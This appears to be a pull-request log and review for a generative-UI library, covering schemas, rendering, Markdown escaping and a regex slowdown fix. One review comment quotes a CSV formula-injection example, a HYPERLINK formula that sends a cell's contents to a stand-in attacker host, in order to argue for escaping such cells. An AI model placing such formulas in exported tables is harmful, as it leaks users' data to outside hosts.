@intentface/chat/genui is the headless core of generative UI: a catalog of elements and views with zod schemas, spec checks, streaming reads, $data bindings and a Markdown export. It imports no React and touches no DOM, so a server can validate, store and index specs with it; tsconfig.pure.json typechecks it without the DOM lib to keep it that way. @intentface/chat/genui-render draws a spec or a view with the consumer's components (GenUi.Root, GenUi.Spec, GenUi.View): steady while the input streams, with an error boundary per piece. zod 4 becomes an optional peer dependency, needed only by these entries. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
…during render useSteady wrote a ref during render, which React Doctor reports as an error (no-ref-current-in-render), the same class fixed in AskUser and Composer.Command. It now keeps the last defined value in state and updates it during render, as React documents for information from previous renders. State compares by identity, so the parsed props are memoised on the element (made once per input by readSpec) and on the view's normalised props: a render with the same input stores nothing new and settles. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
A container's children were capped at 24 in the schema itself, so a catalog for documents or apps could raise the element and depth limits but not this one. Limits gains `children` (default 24): the schema the model is sent is built from the catalog's limit, so the default schema is unchanged, and checkSpec enforces it too, so a single check can lower it. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
normaliseElement reads keys written beside `type` as props, so a `when` (a condition on UI state, planned for a later catalog version) would have become a prop, been dropped by the props schema without a word, and left its element showing unconditionally. `when` is now reserved: it stays on the element, the stored and resolved schemas refuse it by name (elements.<id>.when), and readSpec leaves such an element out of what is drawn rather than draw it without its condition. The input schema the model is sent is unchanged, byte for byte. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Views had no acceptance path: a host validated a view tool's input with its own code, or not at all. canonicalView is the view tier's canonicalSpec. It reads props written beside `view`, refuses a view the catalog doesn't have (listing the ones it does), validates the caption (at most 120 characters; null reads as none) and the props with bindings allowed, and stamps the catalog version. Errors name the field, under `title` or `props`, so they can go back to the model as the tool's answer. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
The export wrote model- and source-written text as Markdown: a cell from a tool result could become a link or an image, `*` became emphasis, and a Text starting with `# ` or `1. ` became a heading or a list. Now that the Markdown is stored beside specs and served to agents, it has to read as written. Every string from the model or a source goes through new helpers in markdown.ts: escapeMarkdownInline for labels, cells and headings, escapeMarkdown for paragraphs (block markers at a line start, indentation), and markdownHeading (a trailing `#` stays text). GFM autolink literals are broken too (`https\://`, `www\.`, `\@`), so a bare address stays text and links come only from the consumer. Checked against micromark with GFM: hostile input renders as one literal paragraph, and ordinary text renders exactly as written. The email view stays plain text, deliberately: it is pasted into a mail client, where every backslash would arrive. The helpers are exported for custom entries, and toMarkdown's JSDoc says to use them. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>

- Mark both entries experimental in the README and on the docs page. - JSDoc on GenUi.Root, GenUi.Spec and GenUi.View, saying what each renders, as every other primitive's parts now have. - scripts/audit-docs.mjs checks the genui page against the renderer's parts (they live in genui-render, so the script gains a source-folder override). Verified to catch a wrong prop name. - The changeset becomes tagged one-liners, per .changeset/README.md, and the changelog page gets a colour for the [GenUi] tag. Render props: an entry may declare a pure toRender(props, context), and its
component is drawn with what it returns instead of the schema props. The
built-ins format every value (Metric's text and delta, table cells and
alignment, chart labels and formatters, record fields), so a component
only draws; ElementRender and ViewRender type the result. Elements gain an
optional summarise for a model's history.
UI state: UiState keeps what the reader did beside the spec, never in it.
initialState, readState (drops pieces that have gone and fields of the wrong
type) and persistedState (keeps what outlives the session). exportSpec and
exportView take the state, and `from` exports one piece's subtree.
Tool helper: genUiTool(catalog, { name, kind, views?, examples?, limits? })
gives a host the description, the JSON schema the model is shown (always an
object at the top), an example it accepts, accept() with a summary,
modelText() and toMarkdown(), with no SDK in it, cached per catalog and
options. compactHistory replaces earlier large UI inputs with what they
showed; partToMarkdown reads a message part as Markdown.

…d copying
- Components get their entry's render props, the schema props as `props`,
and children; defineComponents checks a map against its catalog. Root
takes any part of a map: a piece without a component draws through the
new Fallback slot from its Markdown.
- `phase` ("streaming" | "complete" | "accepted") replaces `complete`.
- Root takes `locale` and `timeZone` for render props, and the reader's UI
state controlled (`state`, `onStateChange`) or not (`defaultState`). A
change carries the package's change details; cancel() keeps it from
landing.
- GenUi.Part marks where a UI sits; copyWithGenUi, on a container's onCopy,
copies a selection that touches it as the UI's whole Markdown.

Entries may declare `fixtures` beside their `example`: more realistic props
in states worth drawing (an empty table, a missing value, a falling
number). Every default entry now has some. fixtures(catalog), in the core,
turns them into inputs: each piece in its example, its own states, and
mid-stream (the example cut short, drawn while streaming).
@intentface/chat/genui-testing is a new entry. checkComponents(map,
{ catalog }) draws every fixture through a component map in a real DOM and
returns what fails as strings, so it works under any test runner: a piece
that throws or draws nothing, text its render props promise that isn't on
screen, a table without header and row roles, a heading without the heading
role, a container that drops its children, a piece with no component.
@testing-library/dom is an optional peer dependency, needed only here.

React Doctor flagged both as new findings: Element's control flow grew with the Fallback branch, and checkComponents ran every check inline in one loop. Element now hands its not-drawn case to NotDrawn and its fallback to ElementFallback; each conformance check is its own small function. No behaviour changes; React Doctor reports nothing in genui. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
…ting The page documents what the first release draws with: render props and defineComponents, the Fallback slot, `phase`, the tool helper, UI state, copying, and the genui-testing entry. The demos draw from render props (formatted text, cells, alignment) through defineComponents. The README lists genui-testing, and the changeset covers all three entries. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
The tool helper's description gains a rule: show UI only by calling the tool, never by writing its input, or any UI as JSON, into a reply. Only a call gets the schema as documentation, acceptance, and a refusal the model can fix, so a host never has to parse specs out of reply text. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
plans/genui.md is the roadmap for the genui entries: the invariants, the four levels of interactivity, the catalog to come, the rendering contract, spec changes, the package API still to build, and the order of work. It covers what this package builds and says generically what a host must do for it to hold. What the first release shipped is marked done; the docs page remains the reference for what exists. Each later step gets a short spec beside it, as plans/genui-<step>.md, committed and reviewed with that step's PR. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
The demo showed only Markdown output, behind a "Data resolved" checkbox that leaned on bindings before the page had introduced them. It now draws the same spec on screen beside its Markdown, starting with the rows loaded, and the toggle reads "Rows loaded" / "Not loaded yet". With the rows not loaded, both sides say where they come from: the Unbound slot on screen, onUnbound in Markdown. A lead sentence says what to look at. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Element and View kept the last props that parsed whatever the phase, so a whole input that stopped parsing stayed drawn as it was. Taking back a table's bound rows left the old rows on screen while the Markdown said they weren't resolved. Holding exists for a stream, where JSON goes valid, invalid and valid again; once whole, a piece that no longer parses is now dropped or drawn by Unbound, as the docs say. A view's caption follows the same rule. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Demo takes `bleed` for a demo that is a whole window of its own: the preview drops its padding and centring and clips the demo to the card's corners, so the card is the window rather than a frame around another. The replay button stays on top, in the demo's top-right corner. Off by default; every other demo is unchanged. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
A reader landing on the page couldn't tell what generative UI is or where its data comes from. It now opens with one turn of a chat, played back: the agent runs its data tool, the model calls show_ui, and the reply draws as the call streams in, beside the JSON the model is writing. The table binds the query's rows by ref instead of copying them, the call is checked with the real `accept`, and "Play with a mistake" shows a refusal going back to the model and the retry replacing it. "How it works" walks the same six steps, and "Data by reference" says concretely where the rows come from and how a chat resolves them. The render-props and views demos show what the model writes beside what it draws, and the views demo has a Markdown switch, replacing the basic, streaming and Markdown demos. Every demo draws with one component map for the whole default catalog, styled with the docs' tokens and passing checkComponents, so it can be copied. The text also fixes what a review found: the timeZone default (UTC, not the runtime's), the tool sample that didn't compile, the controlled-state example that never set state, the entry fields a custom view needs, what the conformance checks cover, and passing the parsed partial input rather than JSON text while a call streams. React Doctor found no new issues. 🎉 Reviewed by React Doctor for commit |
Joining lines matched `\s*\n\s*`, which backtracks across a run of spaces from every start in it: 100,000 spaces with no line break took over five seconds, on text a model or a source wrote (CodeQL: polynomial regular expression). Each run of whitespace is now matched once, whole, and becomes one space when it holds a line break, which is what the old pattern produced. A test pins both the output and the time. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
GenUiView read its input, held its props and drew every outcome in one function (React Doctor: complexity 17). The not-yet-drawn branch is now ViewNotDrawn, as an element's is NotDrawn, and the drawn branch, its component or its Markdown fallback, is ViewDrawn. Holding props only while streaming is one hook, useHeld, shared with Element. No change in what is drawn. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
React Doctor flagged a table cell keyed by its index and a demo module that exported a function beside its components, which stops Fast Refresh keeping their state. Cells now map over the columns they come in order of, keyed by each column's key, and formatJson lives in format-json.ts. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>

Shorten the changeset lines to one short line per change.
The repository rule requires one short line per change. Line 5 is a feature write-up. It lists about ten capabilities and ends with "Imports no React." That is reasoning for the PR body. changelog.cjs prints this text as-is, so the published changelog gets the full paragraph. Keep each line to what changed and the entry name. Move the capability list to the PR body.

Reset Boundary when the piece's render props change.
Boundary sets failed: true once and never clears it. Element and ViewDrawn keep the same Boundary instance across re-renders because the instance is keyed by element id or by "view". Consider this sequence:
- A host component throws on one intermediate streaming chunk. For example, settled props parse, but one array is shorter than another.
Boundarydrops the piece.- Later chunks arrive, then the input moves to
completeoraccepted, or newdataarrives.
After step 3 the piece is still blank for the rest of the mount, even though its final props draw without error. This works against the stated goal: "One broken piece must not take the rest down with it." The same problem applies to a whole input whose bound data changes after the first render.
The fix is to pass a reset key. The memoised rendered object works, because it changes only when props, phase, format or the piece's own state change. Clear failed when the key changes.

Update `Boundary` to accept a reset key and track it in state, clearing `failed`
when the key changes. Pass the memoized `rendered` value as the reset key at
both `Boundary` call sites in `Element` and `ViewDrawn`, so updated render props
can recover after an error.

Read a timestamp without an offset as UTC, not as host-local time.
new Date(value) parses an ISO date-time without an offset in the host's local time zone. An example is "2026-03-01T23:30:00". categoryLabel sends this form here too, because ISO_DAY accepts a missing zone. The parsed instant therefore depends on the machine. The result is then formatted in options.timeZone ?? "UTC". A server in Helsinki and a server in UTC can write different dates for the same spec. The module comment says: "the same spec has to read the same on every machine that renders it". This parse breaks that rule even when the caller passes both locale and timeZone. Treat a zoneless timestamp as UTC, the same way a date-only value is treated.

Update the date parsing in the format === "date" branch so ISO date-time strings
without an explicit time-zone offset are interpreted as UTC, not host-local
time. Add a narrowly scoped check for zoneless timestamps and use it to
normalize the value before constructing the Date; preserve the existing
date-only parsing and timeZone formatting behavior.

Neutralise formula-leading cells in toCsv and toTsv.
Both helpers write text cells unchanged. Cell text comes from the model or from a bound source, and the module comments say not to trust it. Excel and Sheets run a cell that begins with =, +, -, @, tab or carriage return as a formula when the file is opened or the rows are pasted. One example is =HYPERLINK("https://evil.example?"&A1,"x"). A prompt-injected tool result can place such a value into a downloaded table. Prefix such string cells with '. Leave numeric cells unchanged, so a negative number such as -1200 stays a number.

Refuse a child that is listed twice by the same container.
The guard other && other !== id reports a child that has two different parents. It does not report a child that one container lists twice, for example children: ["a", "a"]. canonicalSpec then accepts the spec. exportSpec walks a twice, so the Markdown and the tables list contain that piece twice. A renderer that keys children by id also gets duplicate keys, and one piece of UI state is shared by two drawn copies. A model makes this mistake easily in the flat list form. Report it with the same kind of actionable message as the other checks.
